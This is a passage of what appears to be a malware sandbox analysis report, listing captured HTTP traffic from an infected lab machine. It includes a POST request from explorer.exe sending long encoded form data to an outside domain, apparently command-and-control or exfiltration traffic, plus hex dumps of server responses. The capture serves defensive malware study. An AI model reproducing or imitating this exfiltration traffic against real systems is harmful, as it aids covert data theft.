4f 5f 73 36 39 57 44 6a 47 33 65 79 71 4c 6e 64 77 76 70 38 31 4d 57 6e 43 7a 68 70 64 62 58 56 4d 68 71 69 5a 53 4a 57 70 65 77 71 58 36 57 4e 73 46 57 4c 39 70 69 4b 36 64 32 5a 4e 4c 42 72 34 59 77 55 39 79 66 6f 31 32 62 65 48 62 36 67 79 4f 61 72 7a 79 73 57 58 64 38 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=Vrp8cbIEpYUBfEoulo~5wad7dEMYPL(8NPuDT2gQC8u3KCc7in5Nd6(m(1aRWQYyM2MFVmt1xabSmW6qiNPbbyGx9wE8mxZQLnNg~d3zHEagHzBW8CZpY-h-PBc0j2LmGdSD4CXVwQWTFdsTJAEFEdryF4a_mrdtyjhvEIOrqSJRkWUGKEHZdV3xCXExOp2DUhxDp-EGZCaNbG5gxPtaK9DQU6mkkv0AA7brAuElkNORQdBAkiz5~khl6IbXdsccXrFJcRPxdD3ps7UMncoBF_6opue3ogsur7lr3Ak6KXz_wJAiwIlG(-g3u15S6Zye8WViTe3ZiqGRgCjvVfJlLVLnGPVYfZHIzAQSx7I7JM3acVxqdy0agURgoPDDXgX2wxDkTSpxF79IX9Q7TeM7n_QHbKQ3TJsrtMfxX-3OfaLiO_s69WDjG3eyqLndwvp81MWnCzhpdbXVMhqiZSJWpewqX6WNsFWL9piK6d2ZNLBr4YwU9yfo12beHb6gyOarzysWXd8.
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744667053 CET1149INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:45 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 11649
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb
                                                                                                                                                                                    Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|!IL*.&iZIWg_L0$L`|:lFLi $fyhi7<ZZKn84Wk5S&?Ke*RByYbp???}"3=oBb+vUuv)&<94D`$5=oR4bl=uT7&h4Yf2fmXlicjB~Qm$dz#x/D|Qh9KR9pdJn3hg;Jyb?Cp^q_VLxoaa+@gU:E,V%qU>k3e </%M\:=;5&g?#&<'@h4gBvb-an2'[hLleS`>Pl{ha9YWlh\i~0pm-yh|'`GZ|X'./&M4|fsZ.L=`TcJUE
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744779110 CET1150INData Raw: 60 8a 0a 38 21 44 b8 1d e3 98 65 06 d3 86 55 aa fd 39 43 39 ab cc 16 b3 12 ae ea f3 f7 97 9f b2 f8 f7 58 0a 17 8d 04 18 ca f9 43 f7 47 96 1d c8 f0 83 84 8b f0 c2 20 0f a5 2f d4 f4 5b 5a b3 e5 45 23 12 cc ba ac 72 55 13 bb e5 45 96 29 6d f2 e9 2d
                                                                                                                                                                                    Data Ascii: `8!DeU9C9XCG /[ZE#rUE)m-)8"|1~Sw/#@&o|E[4oytVf>&HpvK;Ve4w]L4p{fV?h8h{ngn5zG{7yguzV?lMY
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744854927 CET1151INData Raw: 51 07 ef 25 39 09 cb e9 76 19 b7 19 0b 43 2e e3 b1 e7 f8 3d 48 89 ef 74 06 f8 9e a4 4c c7 5c 52 a3 b2 b1 bb 3e cc 14 72 4c c7 ee 23 9c 12 60 16 71 9f 4d e2 1d 34 6e 25 fe bd 48 e7 5e a4 7b 2f d2 bb 17 e9 9f 36 d2 23 ac 51 1b 16 a3 e3 93 03 15 79
                                                                                                                                                                                    Data Ascii: Q%9vC.=HtL\R>rL#`qM4n%H^{/6#QyN*.mpW9B0}*KWvP,+-3TPqunc@FB13~tq$81c?s;A%RF3GJ"@,h.xuCwj<O@E
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744926929 CET1153INData Raw: f7 f3 f3 8c 05 40 67 60 e6 00 f2 5e dd de ed 9d 93 07 1a df 28 09 0b d1 35 56 af db 99 d2 f8 3d 76 27 81 e0 d9 58 a3 36 17 5e b6 68 ed fc 37 cb 2b 9a 31 93 8c b9 c4 f5 5e f4 dc 77 9b 93 04 2c d3 31 26 4c 52 74 21 97 63 6a bf d5 0d e8 48 a8 f9 38
                                                                                                                                                                                    Data Ascii: @g`^(5V=v'X6^h7+1^w,1&LRt!cjH8ar02~fi54S0iH#V.9PB;aVs-vUvM0*l-AbM=d*nF|x],B4+.[0%c?wIpQ
                                                                                                                                                                                    Nov 21, 2022 19:22:45.744990110 CET1154INData Raw: c3 ca b9 0c ff b7 be ab 01 3c 9a 7b 32 7c 0e 81 92 e8 b5 e5 e3 e8 9b d4 93 c1 0d 68 c3 4f c2 5e 67 3e b0 1e cd 53 4c 78 5c 93 fa c4 d3 80 1f 52 a3 36 ef 34 d8 07 74 a8 4b bb 07 1a 29 69 68 ce bf 40 d8 3c 65 42 8c 89 a7 21 3d 9e 94 42 c8 8b 14 b3
                                                                                                                                                                                    Data Ascii: <{2|hO^g>SLx\R64tK)ih@<eB!=B=)Nyuf X][s3o)Xy/siL*z_py1`Fbm>Q3Te>g2o`VHS>`0B=(1y 'U<Pcx^s""u0y.cJ}wL\
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745064974 CET1155INData Raw: 4d f2 8c a7 99 d2 86 49 b3 c2 08 96 4c e2 65 c1 f3 84 a2 e4 cb 13 e1 0e cb 6a 90 e7 09 37 70 22 5c 99 5b 83 91 31 01 34 c3 5d 9d 88 b3 c9 af c1 ba e1 37 3c a4 1a c2 13 b1 36 f9 35 58 a2 48 b9 54 c5 1a 14 97 23 e3 53 67 ad ad 7d bc 07 4b 67 e8 c8
                                                                                                                                                                                    Data Ascii: MILej7p"\[14]7<65XHT#Sg}Kg'(K:XodjevUGqBg@Hi*6XpJhh2<u)UvNH,uZb5k<fjrVopDsCg\N7TC
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745130062 CET1157INData Raw: 4d cf 51 dd 73 d2 46 86 79 a0 79 66 08 aa 7c 62 4b 2e 03 51 84 d8 6c 86 5b b9 ce db 92 dd f0 98 19 ae 64 fb 86 c3 dc 49 b9 74 3e af 1a 06 7e b7 d3 71 a3 7e a7 17 f5 82 d9 28 ec 81 0b d5 f4 88 53 96 d3 6d 35 b5 d5 f4 f3 fc fc 0a e5 2b 49 bd 05 76
                                                                                                                                                                                    Data Ascii: MQsFyyf|bK.Ql[dIt>~q~(Sm5+Iv4U!y?Y;|X~T^^:N**%n[MSkf`C8il$rd2vrt$zZs|1eRu~cF'}z;,YdIMMwy$ 7uw+
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745192051 CET1158INData Raw: ca ef bf 11 bf cf 50 46 aa 50 b0 18 7e 6b ed be 6b 76 7f d0 db b3 ed c3 06 77 9d 3e 56 74 7b 2b 04 ff 64 bf 0f ef f9 dd 1b f5 dd c1 b0 db f1 3a 03 bf b7 83 f3 ad 07 70 bc 15 d5 76 8d 3c 1b cd d0 33 40 b8 f4 a7 8d e7 aa d0 01 7c a4 59 96 f0 a0 41
                                                                                                                                                                                    Data Ascii: PFP~kkvw>Vt{+d:pv<3@|YAT.W0zQ9dcq=yQ:n4=jQbdCO)?#aq"A"nxg\pr%" 2cBG-&DoQyFBG#!!e?cuu
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745263100 CET1159INData Raw: f2 d5 30 85 ca 4b 07 cf b8 0c 01 e7 a0 de fd e5 94 49 15 f6 2b 81 87 9c 09 15 d7 f9 67 c5 d4 e2 ed 1a 6f df 63 5f fe e5 7f 2b 3d 56 4b e7 d5 9d 57 8d 5a f9 ea 89 06 3a 62 c7 d3 7c 95 31 93 10 5c d6 c7 5e 87 78 9e 33 14 7d c7 a3 7d a7 43 3d 6a df
                                                                                                                                                                                    Data Ascii: 0KI+goc_+=VKWZ:b|1\^x3}}C=j;>b>={*sT>/mT_ 6q:c1PsL:/_RR*Ir}<&)hjUe6xBpy}QI?16K:?l3Zp|b#v^v
                                                                                                                                                                                    Nov 21, 2022 19:22:45.745320082 CET1160INData Raw: fe dd d9 63 2a 8c 23 15 14 f9 4a 0b 16 5c 5b e7 ca 10 5d 2d 14 aa f2 0e 00 ec 08 c3 0a a3 0e 19 ed 48 22 95 5c 65 af aa bb dd 6e 79 0e 79 9e 09 b6 1c 93 d2 cc 65 28 52 d2 a0 ab bf 00 1c 06 d2 3d 09 6d 97 32 20 20 c2 63 6f 35 2b 0e 00 74 9d 53 4d
                                                                                                                                                                                    Data Ascii: c*#J\[]-H"\enyye(R=m2 co5+tSMjJ(*]7+U7\@HTJ-Kk]4~^h*0MC?E!S)HQz:Lr2.Ie|3wC#fT&A: )V


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    45192.168.11.204987050.87.192.14480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:47.555999994 CET1163OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xn--29-oj9ik7b890b.net
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xn--29-oj9ik7b890b.net/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 56 72 70 38 63 62 49 45 70 59 55 42 66 45 6f 75 6c 6f 7e 35 77 61 64 37 64 45 4d 59 50 4c 28 38 4e 50 75 44 54 32 67 51 43 38 6d 33 4b 77 55 37 6b 47 35 4e 63 36 28 6d 32 56 61 63 57 51 59 72 4d 32 6b 42 56 6d 70 44 78 5a 7a 53 68 46 43 71 69 66 6e 62 4c 43 47 77 6a 41 45 36 69 78 59 52 4c 6e 51 6e 7e 64 53 52 48 30 47 67 57 42 4a 57 72 46 31 71 43 4f 68 34 50 42 63 77 30 6d 4c 41 47 64 6d 54 34 43 62 56 77 56 65 54 45 76 6b 54 4c 58 6f 46 66 64 72 31 4d 59 61 37 28 37 64 69 79 6a 6c 46 45 49 4f 52 71 58 35 52 6b 55 63 47 4c 44 72 59 63 31 33 78 42 58 45 32 4b 70 71 48 55 68 74 4c 70 39 59 47 5a 46 65 4e 55 47 35 67 7a 72 42 62 4a 64 44 4b 66 61 6d 6f 79 66 6f 59 41 37 50 5a 41 75 51 6c 6b 64 61 52 43 36 64 41 70 6a 7a 35 77 6b 68 72 7e 49 62 45 57 4d 64 64 58 72 56 56 63 52 76 4c 64 45 76 70 74 61 30 4d 69 39 6f 41 56 50 36 75 31 65 66 39 6a 41 67 69 72 34 64 33 33 41 6c 69 4b 54 72 5f 77 36 59 69 78 4d 4a 46 79 4f 67 77 69 56 35 44 30 35 4f 55 38 57 4a 36 54 61 7a 4a 69 70 71 52 67 69 6a 76 48 4a 42 6b 45 56 4c 67 45 50 56 4b 62 5a 48 54 7a 41 4e 7a 78 36 4d 4e 4a 39 4c 61 66 46 42 71 4d 79 30 62 6c 30 52 73 68 76 44 4e 63 41 58 32 77 78 66 61 54 58 78 78 46 75 4a 49 57 4b 38 37 58 4a 59 37 72 66 51 46 62 4b 51 6d 54 49 51 49 74 4d 57 53 58 5f 48 6b 66 59 48 69 41 4b 49 36 38 6e 44 73 44 48 65 39 75 4c 6d 48 30 75 56 72 31 4d 4b 56 43 7a 52 35 64 4a 6a 56 4e 68 36 69 64 53 4a 56 38 4f 77 74 51 36 58 4f 6f 46 4c 4b 39 70 57 77 36 65 71 7a 4e 4c 70 72 34 63 46 79 73 6a 28 6c 67 45 44 44 45 64 53 79 34 39 32 78 75 51 30 38 4d 4a 42 4b 6f 47 55 56 71 5a 73 68 6b 5a 47 72 4d 4a 6a 30 66 34 61 44 77 41 53 65 28 34 32 48 41 6a 49 72 48 46 57 79 6f 52 76 67 76 41 77 31 41 4d 75 69 53 79 6e 42 56 56 4c 66 35 48 52 5f 39 5a 4c 54 28 48 6b 70 67 76 6c 48 46 31 76 6b 49 72 65 5f 4e 49 73 58 52 54 4e 6c 45 49 44 7a 77 5f 57 53 48 68 6a 6b 70 45 30 30 4e 4b 31 50 72 5f 74 79 45 41 33 5f 51 73 63 6e 59 75 41 38 4f 4c 63 67 79 6f 4d 37 51 50 50 32 48 61 31 30 53 30 62 4e 71 44 41 48 59 67 6c 79 58 33 58 53 6f 74 32 5f 31 70 4f 6f 39 79 43 2d 59 35 59 69 4e 4d 78 37 47 78 65 6b 4e 45 76 5a 6f 32 66 58 49 75 76 57 69 53 6c 44 66 68 59 42 68 70 68 74 7e 5a 49 34 39 4e 42 30 79 69 6c 70 39 73 38 74 49 32 4d 42 76 65 61 5a 7e 51 44 77 31 6d 66 46 4d 4c 6f 4c 49 54 77 51 31 36 57 74 41 4f 70 71 63 43 4d 71 4e 6d 53 4a 48 43 6c 70 79 58 44 55 44 48 4f 75 78 64 69 73 66 35 7e 53 55 35 71 79 74 41 48 66 62 37 39 6d 4c 42 65 7a 52 30 51 4e 54 30 64 72 5a 5f 79 66 70 71 54 6d 7e 6f 65 67 4a 54 69 52 34 6d 69 52 4f 4d 4f 39 53 4a 34 72 68 39 4c 69 47 37 7a 37 34 33 41 6a 37 78 66 7a 4d 6e 4a 47 79 7a 64 37 43 4d 4d 53 77 51 4e 69 75 4e 48 45 68 5f 58 54 65 78 66 31 5a 30 4e 49 6e 48 76 76 6a 31 38 68 45 33 58 5a 41 44 58 34 7e 54 64 31 41 4c 72 74 74 48 4f 45 71 46 33 2d 78 79 65 72 44 50 71 4f 49 4b 7e 5f 37 77 74 31 66 6f 78 73 41 68 4b 6e 4f 33 28 73 4e 41 7e 46 6c 61 78 72 6d 65 61 69 47 38 6e 2d 43 75 38 6b 37 65 6a 73 41 39 49 50 30 34 5a 2d 55 71 41 70 28 61 6c 72 30 39 76 30 77 33 55 56 79 46 72 37 7a 74 61 64 28 46 50 69 43 69 66 78 4f 4a 52 45 44 5a 59 37 74 54 62 36 79 63 61 67 30 6b 4b 72 56 75 6c 31 46 6a 45 6b 46 52 4d 46 6d 54 34 5f 78 68 4f 57 7e 6d 4a 49 58 30 33 4c 32 59 71 4b 4c 6b 6b 38 4e 7a 78 73 70 5f 57 75 75 6b 79 75 73 78 30 4d 73 42 37 54 71 34 79 62 57 4b 76 65 73 6e 78 4c 28 43 35 34 62 48 77 59 66 37 66 70 63 6e 67 71 74 41 46 4d 7e 65 56 4c 52 6d 6b 4e 51 52 28 66 57 61 28 4f 4a 65 4f 39 51 45 7a 6e 4a 31 34 37 74 64 4a 44 4b 78 67 6d 4b 78 59 56 78 59 44 50 79 7a 71 56 34 5f 39 52 54 77 78 77 57 70 4b 4c 73 52 67 4b 4d 66 30 64 4d 4d 36 31 43 73 77 5f 59 54 46 6c 69 48 76 7a 4d 69 39 66 32 38 7e 38 5a 35 68 45 67 69 72 74 28 32 28 79 28 44 37 4c 74 71 76 55 4f 4b 50 2d 51 45 31 75 77 6e 32 53 51 68 57 75 45 4b 4e 4e 53 61 7e 52 79 5a 68 61 45 77 73 6c 62 5f 43 73 57 2d 4a 62 4c 38 42 52 49 74 77 2d 75 65 75 36 4e 6d 57 72 4a 76 7a 75 5a 49 4c 72 7a 6f 7a 44 55 54 72 42 45 57 52 54 33 6d 41 6a 7a 36 4b 31 42 61 36 66 65 67 56 49 57 75 4a 31 30 41 6e 50 48 54 66 58 67 6f 46 38 66 45 39 57 47
                                                                                                                                                                                    Data Ascii: r4txB=Vrp8cbIEpYUBfEoulo~5wad7dEMYPL(8NPuDT2gQC8m3KwU7kG5Nc6(m2VacWQYrM2kBVmpDxZzShFCqifnbLCGwjAE6ixYRLnQn~dSRH0GgWBJWrF1qCOh4PBcw0mLAGdmT4CbVwVeTEvkTLXoFfdr1MYa7(7diyjlFEIORqX5RkUcGLDrYc13xBXE2KpqHUhtLp9YGZFeNUG5gzrBbJdDKfamoyfoYA7PZAuQlkdaRC6dApjz5wkhr~IbEWMddXrVVcRvLdEvpta0Mi9oAVP6u1ef9jAgir4d33AliKTr_w6YixMJFyOgwiV5D05OU8WJ6TazJipqRgijvHJBkEVLgEPVKbZHTzANzx6MNJ9LafFBqMy0bl0RshvDNcAX2wxfaTXxxFuJIWK87XJY7rfQFbKQmTIQItMWSX_HkfYHiAKI68nDsDHe9uLmH0uVr1MKVCzR5dJjVNh6idSJV8OwtQ6XOoFLK9pWw6eqzNLpr4cFysj(lgEDDEdSy492xuQ08MJBKoGUVqZshkZGrMJj0f4aDwASe(42HAjIrHFWyoRvgvAw1AMuiSynBVVLf5HR_9ZLT(HkpgvlHF1vkIre_NIsXRTNlEIDzw_WSHhjkpE00NK1Pr_tyEA3_QscnYuA8OLcgyoM7QPP2Ha10S0bNqDAHYglyX3XSot2_1pOo9yC-Y5YiNMx7GxekNEvZo2fXIuvWiSlDfhYBhpht~ZI49NB0yilp9s8tI2MBveaZ~QDw1mfFMLoLITwQ16WtAOpqcCMqNmSJHClpyXDUDHOuxdisf5~SU5qytAHfb79mLBezR0QNT0drZ_yfpqTm~oegJTiR4miROMO9SJ4rh9LiG7z743Aj7xfzMnJGyzd7CMMSwQNiuNHEh_XTexf1Z0NInHvvj18hE3XZADX4~Td1ALrttHOEqF3-xyerDPqOIK~_7wt1foxsAhKnO3(sNA~FlaxrmeaiG8n-Cu8k7ejsA9IP04Z-UqAp(alr09v0w3UVyFr7ztad(FPiCifxOJREDZY7tTb6ycag0kKrVul1FjEkFRMFmT4_xhOW~mJIX03L2YqKLkk8Nzxsp_Wuukyusx0MsB7Tq4ybWKvesnxL(C54bHwYf7fpcngqtAFM~eVLRmkNQR(fWa(OJeO9QEznJ147tdJDKxgmKxYVxYDPyzqV4_9RTwxwWpKLsRgKMf0dMM61Csw_YTFliHvzMi9f28~8Z5hEgirt(2(y(D7LtqvUOKP-QE1uwn2SQhWuEKNNSa~RyZhaEwslb_CsW-JbL8BRItw-ueu6NmWrJvzuZILrzozDUTrBEWRT3mAjz6K1Ba6fegVIWuJ10AnPHTfXgoF8fE9WGai4FvpewpemXbFET8DegVBMiGOKSN4uAiw8oEvh3Ktb4I9cfbzg2QSqa5cNySmPMLCnVwrYZsPjN9cV~WpPyRLRviyZB-nUUthkeH5MX9xd~KSa6JMmO8rQgIq7z4f_hLdtVK8Q0FYjFgaNUkdZ1nBKFzpoIDeNWw11Lbmv16g8EkjJjkZ2fEwuaqs7CtjxqHJTWc8TfLn44ZtYULmDhVaexzpqIdCeJEAapXhPJ79jGKljOwSnJ7ZjDjvOQh7MahamUV9iMdIQ0Hw1f6O8mQGakIlWVuTFTT30srzD1STgVsO8xvYirBQKT3WaipIgdJvCScYmLnUmi6fqYmKBicPP2mpS9FBjdeKVb_SiahgTCdKZxddEtVKL7m(tf9Ma7E8Xhe9my8Yk8ukigUzLDlNnnMmfY-zxwSfarvkt0ZYrZP35x_LTxtZOE4cAwubSUHBsjymnglXF~mZkkkJg1cItjeJhPnBcbT1W6OSNMFyyeeHCwmA5SDHE1LHyhlL_D2OM~ZZ86wEV5dLrDp4nX80d31fZyrKiuh8FLINsxxNu~i5W61NafzAVksW9VbAsZve_f9LcbNiCtndtkqEyIa4U27DCMRldTE9LMoqBhzUAE-mkkjWUuoInztRIw7IE7LUjf0zRuZ3niDllPoklROtFvB5aEGRuwzVaxjOoYAPKn98Ud05TZAH0BAu5(qTRubkS6p64ekVIOYGkZxis2D~oHXq9eIU7kDUQ(VJIWiKAM5P_KJ536_BOn6LbwNzVGZykSL4f8TC6I5Lcw2
                                                                                                                                                                                    Nov 21, 2022 19:22:47.556061983 CET1173OUTData Raw: 70 6c 53 4f 38 53 70 47 38 50 75 67 59 66 77 70 7e 6c 6e 4f 4d 30 77 71 6b 41 32 42 6c 37 65 56 6a 49 44 42 6f 43 55 33 28 58 4f 35 66 6d 36 52 76 38 44 4c 74 45 39 64 6c 47 4c 78 41 67 55 49 45 50 49 45 59 56 6d 6b 66 61 4d 6c 75 4c 4d 47 51 49
                                                                                                                                                                                    Data Ascii: plSO8SpG8PugYfwp~lnOM0wqkA2Bl7eVjIDBoCU3(XO5fm6Rv8DLtE9dlGLxAgUIEPIEYVmkfaMluLMGQI2xlOZe9B(-Gjj4VBRCBKYXNl5n5dIvbIQ7Kx4kjUXBTS2ZpjXEXsddPCcv86aEWwZ5BcyoV-Km476UnxJ_Q9lSmv1f2DvzpJGCmEw0f5oxF_(aa7zZJxPtuLK4~fkU0genGEidOqgZacWH8SriBwCjVJ1eoPqxg12
                                                                                                                                                                                    Nov 21, 2022 19:22:47.717827082 CET1176OUTData Raw: 4b 6f 61 58 74 52 76 45 72 53 4e 77 56 33 74 50 46 74 33 31 6f 56 73 68 59 4b 61 6a 4e 35 6d 6b 75 70 72 41 61 41 35 42 36 51 59 34 28 68 52 4b 75 76 4c 48 47 64 49 66 4a 38 7e 66 74 55 73 4a 28 45 70 52 73 47 6f 37 58 56 67 31 41 50 43 4e 57 55
                                                                                                                                                                                    Data Ascii: KoaXtRvErSNwV3tPFt31oVshYKajN5mkuprAaA5B6QY4(hRKuvLHGdIfJ8~ftUsJ(EpRsGo7XVg1APCNWUbAOOiaiBTN1FKdpMeJSPBq2cQbpo6zgaMXtoMnTSF14pcaee92wbk5TVASHGBiadUbkY7yzXry7gyGfVV7SfY37W7z7j5zcajwdomKP3yrS7ioJSWXtcK4AWJwsN9PJH~sv0KBavO93nTQOJlh6tgb~BWdJKnvA8r
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718014002 CET1184OUTData Raw: 41 2d 54 42 35 4f 65 68 35 37 54 68 70 48 56 72 47 6d 4c 63 6a 71 48 76 37 52 59 44 55 62 68 70 6d 70 49 39 70 64 6f 54 6c 46 77 65 6f 74 57 41 42 45 4c 4a 6d 67 6c 4d 71 6a 31 4c 32 47 31 63 34 49 74 56 7e 53 28 43 33 41 48 66 54 6f 44 76 58 71
                                                                                                                                                                                    Data Ascii: A-TB5Oeh57ThpHVrGmLcjqHv7RYDUbhpmpI9pdoTlFweotWABELJmglMqj1L2G1c4ItV~S(C3AHfToDvXqJaji7o(HYm8x9rocdtH0uns2exqrAa6QD-svFvIXCzMbgQNG7WAYC9uvH2nKjxwufnRBsO60UYF0KEIBe8v1NzAr6p8TFQaKpRTRdeMmJRB8jZx-KIU1BGEP1OQPjYUybQ65Rf1yvjw47_5D4Nqj7Z(Z6lvQFbo_2
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718215942 CET1192OUTData Raw: 30 2d 6e 4f 59 69 58 59 71 47 58 74 77 31 56 6c 6a 6c 44 44 50 74 48 79 53 6d 31 76 51 54 56 7a 34 36 6e 77 76 34 63 34 4f 54 37 6b 4d 79 56 44 71 35 45 68 65 48 64 59 72 6f 56 7a 79 51 6e 54 4b 65 31 74 37 58 46 35 52 69 78 53 34 6e 4d 6e 33 78
                                                                                                                                                                                    Data Ascii: 0-nOYiXYqGXtw1VljlDDPtHySm1vQTVz46nwv4c4OT7kMyVDq5EheHdYroVzyQnTKe1t7XF5RixS4nMn3x38emd9vTldxgdPuHi1HILVfookeMipolpKKxHVnfMIFr8gVHkc99Il3uBOqbvHpUDip1gNpi9YQoKJ7K5BXWacJYFBJd(ZXNGBunpfpTmgqOKyM4vsqRz8ohNaNoQvFv6rtY84JzRZjh9YeKR4CWBR7xnmRlu8p-d
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718328953 CET1194OUTData Raw: 55 57 61 73 35 38 61 6e 46 76 39 76 54 39 70 6f 42 30 4a 57 6d 6a 6a 70 67 78 68 53 69 6b 58 57 61 41 67 6f 37 69 45 4a 53 38 4d 69 78 75 61 47 45 4c 35 67 36 74 6e 4b 64 64 79 4f 34 55 4c 49 4f 6d 31 5f 5a 31 4f 4c 30 4b 51 77 32 52 6b 66 71 4d
                                                                                                                                                                                    Data Ascii: UWas58anFv9vT9poB0JWmjjpgxhSikXWaAgo7iEJS8MixuaGEL5g6tnKddyO4ULIOm1_Z1OL0KQw2RkfqMjgezEbPmBhXm(uuYgsN4N8(p9p0CG44nG2~M9w7_jArBRiyxLvjJTExG3qE3y1mk3-8PnIl1Xz3aJ5IvjChRGgbOpCINazemYrSNKWZcFpBWlqoTJ1p_xHNP0RF5j3xMnFRDI4ET(HKnZ4fCdHGMJ9WmAhUwJrRiq
                                                                                                                                                                                    Nov 21, 2022 19:22:47.718545914 CET1199OUTData Raw: 51 63 64 51 35 63 33 4f 42 5f 33 76 59 69 48 50 4d 79 68 58 43 38 37 73 68 47 72 7a 4c 4c 52 53 42 62 39 35 76 6a 34 56 4a 77 31 46 31 6d 71 59 73 4c 32 76 6d 36 6a 6a 55 70 72 6c 5a 58 56 5f 56 6b 32 2d 6d 41 54 69 38 63 69 4b 5a 45 46 74 7e 55
